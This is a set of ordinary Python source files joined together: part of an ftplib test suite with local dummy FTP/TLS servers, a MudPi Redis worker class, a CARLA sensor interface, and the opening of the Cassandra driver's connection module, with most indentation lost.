self.host, self.port = self.socket.getsockname()[:2]
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accept(self):
conn, addr = self.accept()
self.handler = self.handler(conn)
self.close()
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert.pem")
class SSLConnection(object, asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
self.socket = ssl.wrap_socket(self.socket, suppress_ragged_eofs=False,
certfile=CERTFILE, server_side=True,
do_handshake_on_connect=False,
ssl_version=ssl.PROTOCOL_SSLv23)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error, err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except socket.error, err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
super(SSLConnection, self).close()
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return ''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return ''
raise
def handle_error(self):
raise
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=10)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, IOError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_retrbinary(self):
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', received.append, rest=rest)
self.assertEqual(''.join(received), RETR_DATA[rest:],
msg='rest test case %d %d %d' % (rest,
len(''.join(received)),
len(RETR_DATA[rest:])))
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = StringIO.StringIO(RETR_DATA)
self.client.storbinary('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = StringIO.StringIO(RETR_DATA)
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler.rest, str(r))
def test_storlines(self):
f = StringIO.StringIO(RETR_DATA.replace('\r\n', '\n'))
self.client.storlines('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_makeport(self):
self.client.makeport()
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 10)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'pasv')
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP()
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
self.client.makeport()
self.assertEqual(self.server.handler.last_received_cmd, 'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 10)
conn.close()
self.assertEqual(self.server.handler.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=10)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=10)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
sock = self.client.transfercmd('list')
self.assertNotIsInstance(sock, ssl.SSLSocket)
sock.close()
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
sock = self.client.transfercmd('list')
self.assertIsInstance(sock, ssl.SSLSocket)
sock.close()
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
sock = self.client.transfercmd('list')
self.assertNotIsInstance(sock, ssl.SSLSocket)
sock.close()
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_auth_ssl(self):
try:
self.client.ssl_version = ssl.PROTOCOL_SSLv3
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
finally:
self.client.ssl_version = ssl.PROTOCOL_TLSv1
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
threading.Thread(target=self.server, args=(self.evt,self.sock)).start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
ftplib.FTP.port = self.port
def tearDown(self):
self.evt.wait()
def server(self, evt, serv):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
serv.listen(5)
# (1) Signal the caller that we are ready to accept the connection.
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
conn.send("1 Hola mundo\n")
# (2) Signal the caller that it is safe to close the socket.
evt.set()
conn.close()
finally:
serv.close()
# (3) Signal the caller that we are done.
evt.set()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost")
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost", timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(ftp.sock.gettimeout() is None)
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts]
if socket.has_ipv6:
try:
DummyFTPServer((HOST, 0), af=socket.AF_INET6)
except socket.error:
pass
else:
tests.append(TestIPv6Environment)
if ssl is not None:
tests.extend([TestTLS_FTPClassMixin, TestTLS_FTPClass])
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
worker.py
|
import time
import datetime
import json
import redis
import threading
import sys
sys.path.append('..')
import variables
from logger.Logger import Logger, LOG_LEVEL
def log(func):
def wrapper(*args, **kwargs):
print("MudPi Debug Log: " + " ".join([str(arg) for arg in args]) + " at " + str(datetime.datetime.now()))
value = func(*args, **kwargs)
        return value
    return wrapper
# Base Worker Class
# A worker is responsible for handling its set of operations and running on a thread
class Worker():
def __init__(self, config, main_thread_running, system_ready):
self.config = config
try:
self.r = config["redis"]
except KeyError:
self.r = redis.Redis(host='127.0.0.1', port=6379)
self.topic = config.get('topic', 'mudpi').replace(" ", "_").lower()
self.sleep_duration = config.get('sleep_duration', 15)
# Threading Events to Keep Everything in Sync
self.main_thread_running = main_thread_running
self.system_ready = system_ready
self.worker_available = threading.Event()
self.components = []
return
def init(self):
# print('Worker...\t\t\t\033[1;32m Initializing\033[0;0m'.format(**control))
return
def run(self):
t = threading.Thread(target=self.work, args=())
t.start()
return t
def work(self):
while self.main_thread_running.is_set():
if self.system_ready.is_set():
time.sleep(self.sleep_duration)
        # This only runs after the main thread has shut down
Logger.log(LOG_LEVEL["info"], "Worker Shutting Down...\t\033[1;32m Complete\033[0;0m")
def elapsedTime(self):
self.time_elapsed = time.perf_counter() - self.time_start
return self.time_elapsed
def resetElapsedTime(self):
self.time_start = time.perf_counter()
pass
def dynamic_import(self, name):
# Split path of the class folder structure: {sensor name}_sensor . {SensorName}Sensor
components = name.split('.')
# Dynamically import root of component path
module = __import__(components[0])
# Get component attributes
for component in components[1:]:
module = getattr(module, component)
return module
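    # Normalize a Redis pub/sub message into a dict: dicts pass through unchanged, JSON strings
    # are parsed, and anything that cannot be decoded is wrapped in a generic
    # {'event': 'Unknown', 'data': message} payload.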
def decodeMessageData(self, message):
if isinstance(message, dict):
#print('Dict Found')
return message
elif isinstance(message.decode('utf-8'), str):
try:
temp = json.loads(message.decode('utf-8'))
#print('Json Found')
return temp
except:
#print('Json Error. Str Found')
return {'event':'Unknown', 'data':message}
else:
#print('Failed to detect type')
return {'event':'Unknown', 'data':message}
|
sensor_interface.py
|
import copy
import logging
import numpy as np
import os
import time
from threading import Thread
import carla
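# Decorator that runs the wrapped function in a daemon thread and returns the Thread
# object instead of the function's result.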
def threaded(fn):
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
        thread.daemon = True
thread.start()
return thread
return wrapper
class HDMapMeasurement(object):
def __init__(self, data, frame_number):
self.data = data
self.frame_number = frame_number
class HDMapReader(object):
def __init__(self, vehicle, reading_frequency=1.0):
self._vehicle = vehicle
self._reading_frequency = reading_frequency
self._CARLA_ROOT = os.getenv('CARLA_ROOT', "./")
self._callback = None
self._frame_number = 0
self._run_ps = True
self.run()
def __call__(self):
map_name = os.path.basename(self._vehicle.get_world().get_map().name)
transform = self._vehicle.get_transform()
return {'map_file': "{}/HDMaps/{}.ply".format(self._CARLA_ROOT, map_name),
'transform': {'x': transform.location.x,
'y': transform.location.y,
'z': transform.location.z,
'yaw': transform.rotation.yaw,
'pitch': transform.rotation.pitch,
'roll': transform.rotation.roll}
}
@threaded
def run(self):
latest_read = time.time()
while self._run_ps:
if self._callback is not None:
capture = time.time()
if capture - latest_read > (1 / self._reading_frequency):
self._callback(HDMapMeasurement(self.__call__(), self._frame_number))
self._frame_number += 1
latest_read = time.time()
else:
time.sleep(0.001)
def listen(self, callback):
        # Register the callback that will receive what the producer emits.
self._callback = callback
def destroy(self):
self._run_ps = False
class SpeedMeasurement(object):
def __init__(self, data, frame_number):
self.data = data
self.frame_number = frame_number
class Speedometer(object):
"""
Speed pseudo sensor that gets the current speed of the vehicle.
This sensor is not placed at the CARLA environment. It is
only an asynchronous interface to the forward speed.
"""
def __init__(self, vehicle, reading_frequency):
# The vehicle where the class reads the speed
self._vehicle = vehicle
# How often do you look at your speedometer in hz
self._reading_frequency = reading_frequency
self._callback = None
# Counts the frames
self._frame_number = 0
self._run_ps = True
self.produce_speed()
def _get_forward_speed(self):
""" Convert the vehicle transform directly to forward speed """
velocity = self._vehicle.get_velocity()
transform = self._vehicle.get_transform()
vel_np = np.array([velocity.x, velocity.y, velocity.z])
pitch = np.deg2rad(transform.rotation.pitch)
yaw = np.deg2rad(transform.rotation.yaw)
orientation = np.array([np.cos(pitch) * np.cos(yaw), np.cos(pitch) * np.sin(yaw), np.sin(pitch)])
speed = np.dot(vel_np, orientation)
return speed
@threaded
def produce_speed(self):
latest_speed_read = time.time()
while self._run_ps:
if self._callback is not None:
capture = time.time()
if capture - latest_speed_read > (1 / self._reading_frequency):
self._callback(SpeedMeasurement(self._get_forward_speed(), self._frame_number))
self._frame_number += 1
latest_speed_read = time.time()
else:
time.sleep(0.001)
def listen(self, callback):
        # Register the callback that will receive what the producer emits.
self._callback = callback
def destroy(self):
self._run_ps = False
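# Adapter registered as the sensor callback: it inspects the type of each incoming CARLA
# measurement, converts it into a plain numpy-friendly structure and pushes the result into
# the shared SensorInterface buffer under the sensor's tag.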
class CallBack(object):
def __init__(self, tag, sensor, data_provider):
self._tag = tag
self._data_provider = data_provider
self._data_provider.register_sensor(tag, sensor)
def __call__(self, data):
if isinstance(data, carla.Image):
self._parse_image_cb(data, self._tag)
elif isinstance(data, carla.LidarMeasurement):
self._parse_lidar_cb(data, self._tag)
elif isinstance(data, carla.GnssEvent):
self._parse_gnss_cb(data, self._tag)
elif isinstance(data, SpeedMeasurement):
self._parse_speedometer(data, self._tag)
elif isinstance(data, HDMapMeasurement):
self._parse_hdmap(data, self._tag)
else:
logging.error('No callback method for this sensor.')
def _parse_image_cb(self, image, tag):
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = copy.deepcopy(array)
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self._data_provider.update_sensor(tag, array, image.frame_number)
def _parse_lidar_cb(self, lidar_data, tag):
points = np.frombuffer(lidar_data.raw_data, dtype=np.dtype('f4'))
points = copy.deepcopy(points)
points = np.reshape(points, (int(points.shape[0] / 3), 3))
self._data_provider.update_sensor(tag, points, lidar_data.frame_number)
def _parse_gnss_cb(self, gnss_data, tag):
array = np.array([gnss_data.latitude,
gnss_data.longitude,
gnss_data.altitude], dtype=np.float32)
self._data_provider.update_sensor(tag, array, gnss_data.frame_number)
def _parse_speedometer(self, speed, tag):
self._data_provider.update_sensor(tag, speed.data, speed.frame_number)
def _parse_hdmap(self, hd_package, tag):
self._data_provider.update_sensor(tag, hd_package.data, hd_package.frame_number)
class SensorInterface(object):
def __init__(self):
self._sensors_objects = {}
self._data_buffers = {}
self._timestamps = {}
def register_sensor(self, tag, sensor):
if tag in self._sensors_objects:
raise ValueError("Duplicated sensor tag [{}]".format(tag))
self._sensors_objects[tag] = sensor
self._data_buffers[tag] = None
self._timestamps[tag] = -1
def update_sensor(self, tag, data, timestamp):
if tag not in self._sensors_objects:
raise ValueError("The sensor with tag [{}] has not been created!".format(tag))
self._data_buffers[tag] = data
self._timestamps[tag] = timestamp
def all_sensors_ready(self):
for key in self._sensors_objects.keys():
if self._data_buffers[key] is None:
return False
return True
def get_data(self):
data_dict = {}
for key in self._sensors_objects.keys():
data_dict[key] = (self._timestamps[key], copy.deepcopy(self._data_buffers[key]))
return data_dict
|
connection.py
|
# Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import # to enable import io from stdlib
from collections import defaultdict, deque
import errno
from functools import wraps, partial, total_ordering
from heapq import heappush, heappop
import io
import logging
import six
from six.moves import range
import socket
import struct
import sys
from threading import Thread, Event, RLock
import time
try:
import ssl
except ImportError:
ssl = None # NOQA
if 'gevent.monkey' in sys.modules:
from gevent.queue import Queue, Empty
else:
from six.moves.queue import Queue, Empty # noqa
from cassandra import ConsistencyLevel, AuthenticationFailed, OperationTimedOut, ProtocolVersion
from cassandra.marshal import int32_pack
from cassandra.protocol import (ReadyMessage, AuthenticateMessage, OptionsMessage,
StartupMessage, ErrorMessage, CredentialsMessage,
QueryMessage, ResultMessage, ProtocolHandler,
InvalidRequestException, SupportedMessage,
AuthResponseMessage, AuthChallengeMessage,
AuthSuccessMessage, ProtocolException,
RegisterMessage)
from cassandra.util import OrderedDict
log = logging.getLogger(__name__)
# We use an ordered dictionary and specifically add lz4 before
# snappy so that lz4 will be preferred. Changing the order of this
# will change the compression preferences for the driver.
locally_supported_compressions = OrderedDict()
try:
import lz4
except ImportError:
pass
else:
# The compress and decompress functions we need were moved from the lz4 to
# the lz4.block namespace, so we try both here.
try:
from lz4 import block as lz4_block
except ImportError:
lz4_block = lz4
try:
lz4_block.compress
lz4_block.decompress
except AttributeError:
raise ImportError(
'lz4 not imported correctly. Imported object should have '
            '.compress and .decompress attributes but does not. '
'Please file a bug report on JIRA. (Imported object was '
'{lz4_block})'.format(lz4_block=repr(lz4_block))
)
# Cassandra writes the uncompressed message length in big endian order,
# but the lz4 lib requires little endian order, so we wrap these
# functions to handle that
def lz4_compress(byts):
# write length in big-endian instead of little-endian
return int32_pack(len(byts)) + lz4_block.compress(byts)[4:]
def lz4_decompress(byts):
# flip from big-endian to little-endian
return lz4_block.decompress(byts[3::-1] + byts[4:])
locally_supported_compressions['lz4'] = (lz4_compress, lz4_decompress)
try:
import snappy
except ImportError:
pass
else:
# work around apparently buggy snappy decompress
def decompress(byts):
if byts == '\x00':
return ''
return snappy.decompress(byts)
locally_supported_compressions['snappy'] = (snappy.compress, decompress)
DRIVER_NAME, DRIVER_VERSION = 'DataStax Python Driver', sys.modules['cassandra'].__version__
PROTOCOL_VERSION_MASK = 0x7f
HEADER_DIRECTION_FROM_CLIENT = 0x00
HEADER_DIRECTION_TO_CLIENT = 0x80
HEADER_DIRECTION_MASK = 0x80
frame_header_v1_v2 = struct.Struct('>BbBi')
frame_header_v3 = struct.Struct('>BhBi')
class EndPoint(object):
"""
Represents the information to connect to a cassandra node.
"""
@property
def address(self):
"""
The IP address of the node. This is the RPC address the driver uses when connecting to the node
"""
raise NotImplementedError()
@property
def port(self):
"""
The port of the node.
"""
raise NotImplementedError()
@property
def ssl_options(self):
"""
SSL options specific to this endpoint.
"""
return None
def resolve(self):
"""
Resolve the endpoint to an address/port. This is called
only on socket connection.
"""
raise NotImplementedError()
class EndPointFactory(object):
cluster = None
def configure(self, cluster):
"""
This is called by the cluster during its initialization.
"""
self.cluster = cluster
return self
def create(self, row):
"""
Create an EndPoint from a system.peers row.
"""
raise NotImplementedError()
@total_ordering
class DefaultEndPoint(EndPoint):
"""
Default EndPoint implementation, basically just an address and port.
"""
def __init__(self, address, port=9042):
self._address = address
self._port = port
@property
def address(self):
return self._address
@property
def port(self):
return self._port
def resolve(self):
return self._address, self._port
def __eq__(self, other):
return isinstance(other, DefaultEndPoint) and \
self.address == other.address and self.port == other.port
def __hash__(self):
return hash((self.address, self.port))
def __lt__(self, other):
return (self.address, self.port) < (other.address, other.port)
def __str__(self):
return str("%s:%d" % (self.address, self.port))
def __repr__(self):
return "<%s: %s:%d>" % (self.__class__.__name__, self.address, self.port)
class DefaultEndPointFactory(EndPointFactory):
port = None
"""
If set, force all endpoints to use this port.
"""
def __init__(self, port=None):
self.port = port
def create(self, row):
addr = None
if "rpc_address" in row:
addr = row.get("rpc_address")
if "native_transport_address" in row:
addr = row.get("native_transport_address")
if not addr or addr in ["0.0.0.0", "::"]:
addr = row.get("peer")
# create the endpoint with the translated address
return DefaultEndPoint(
self.cluster.address_translator.translate(addr),
self.port if self.port is not None else 9042)
class _Frame(object):
def __init__(self, version, flags, stream, opcode, body_offset, end_pos):
self.version = version
self.flags = flags
self.stream = stream
self.opcode = opcode
self.body_offset = body_offset
self.end_pos = end_pos
def __eq__(self, other): # facilitates testing
if isinstance(other, _Frame):
return (self.version == other.version and
self.flags == other.flags and
self.stream == other.stream and
self.opcode == other.opcode and
self.body_offset == other.body_offset and
self.end_pos == other.end_pos)
return NotImplemented
def __str__(self):
return "ver({0}); flags({1:04b}); stream({2}); op({3}); offset({4}); len({5})".format(self.version, self.flags, self.stream, self.opcode, self.body_offset, self.end_pos - self.body_offset)
NONBLOCKING = (errno.EAGAIN, errno.EWOULDBLOCK)
class ConnectionException(Exception):
"""
An unrecoverable error was hit when attempting to use a connection,
or the connection was already closed or defunct.
"""
def __init__(self, message, endpoint=None):
Exception.__init__(self, message)
self.endpoint = endpoint
@property
def host(self):
return self.endpoint.address
class ConnectionShutdown(ConnectionException):
"""
Raised when a connection has been marked as defunct or has been closed.
"""
pass
class ProtocolVersionUnsupported(ConnectionException):
"""
Server rejected startup message due to unsupported protocol version
"""
def __init__(self, endpoint, startup_version):
msg = "Unsupported protocol version on %s: %d" % (endpoint, startup_version)
super(ProtocolVersionUnsupported, self).__init__(msg, endpoint)
self.startup_version = startup_version
class ConnectionBusy(Exception):
"""
An attempt was made to send a message through a :class:`.Connection` that
was already at the max number of in-flight operations.
"""
pass
class ProtocolError(Exception):
"""
Communication did not match the protocol that this driver expects.
"""
pass
def defunct_on_error(f):
@wraps(f)
def wrapper(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
except Exception as exc:
self.defunct(exc)
return wrapper
DEFAULT_CQL_VERSION = '3.0.0'
if six.PY3:
def int_from_buf_item(i):
return i
else:
int_from_buf_item = ord
class Connection(object):
CALLBACK_ERR_THREAD_THRESHOLD = 100
in_buffer_size = 4096
out_buffer_size = 4096
cql_version = None
no_compact = False
protocol_version = ProtocolVersion.MAX_SUPPORTED
keyspace = None
compression = True
compressor = None
decompressor = None
endpoint = None
ssl_options = None
ssl_context = None
last_error = None
# The current number of operations that are in flight. More precisely,
# the number of request IDs that are currently in use.
in_flight = 0
# Max concurrent requests allowed per connection. This is set optimistically high, allowing
# all request ids to be used in protocol version 3+. Normally concurrency would be controlled
# at a higher level by the application or concurrent.execute_concurrent. This attribute
# is for lower-level integrations that want some upper bound without reimplementing.
max_in_flight = 2 ** 15
# A set of available request IDs. When using the v3 protocol or higher,
# this will not initially include all request IDs in order to save memory,
# but the set will grow if it is exhausted.
request_ids = None
# Tracks the highest used request ID in order to help with growing the
# request_ids set
highest_request_id = 0
is_defunct = False
is_closed = False
lock = None
user_type_map = None
msg_received = False
is_unsupported_proto_version = False
is_control_connection = False
signaled_error = False # used for flagging at the pool level
allow_beta_protocol_version = False
_iobuf = None
_current_frame = None
_socket = None
_socket_impl = socket
_ssl_impl = ssl
_check_hostname = False
def __init__(self, host='127.0.0.1', port=9042, authenticator=None,
ssl_options=None, sockopts=None, compression=True,
cql_version=None, protocol_version=ProtocolVersion.MAX_SUPPORTED, is_control_connection=False,
user_type_map=None, connect_timeout=None, allow_beta_protocol_version=False, no_compact=False,
ssl_context=None):
# TODO next major rename host to endpoint and remove port kwarg.
self.endpoint = host if isinstance(host, EndPoint) else DefaultEndPoint(host, port)
self.authenticator = authenticator
self.ssl_options = ssl_options.copy() if ssl_options else None
self.ssl_context = ssl_context
self.sockopts = sockopts
self.compression = compression
self.cql_version = cql_version
self.protocol_version = protocol_version
self.is_control_connection = is_control_connection
self.user_type_map = user_type_map
self.connect_timeout = connect_timeout
self.allow_beta_protocol_version = allow_beta_protocol_version
self.no_compact = no_compact
self._push_watchers = defaultdict(set)
self._requests = {}
self._iobuf = io.BytesIO()
if ssl_options:
self._check_hostname = bool(self.ssl_options.pop('check_hostname', False))
if self._check_hostname:
if not getattr(ssl, 'match_hostname', None):
raise RuntimeError("ssl_options specify 'check_hostname', but ssl.match_hostname is not provided. "
"Patch or upgrade Python to use this option.")
self.ssl_options.update(self.endpoint.ssl_options or {})
elif self.endpoint.ssl_options:
self.ssl_options = self.endpoint.ssl_options
if protocol_version >= 3:
self.max_request_id = min(self.max_in_flight - 1, (2 ** 15) - 1)
# Don't fill the deque with 2**15 items right away. Start with some and add
# more if needed.
initial_size = min(300, self.max_in_flight)
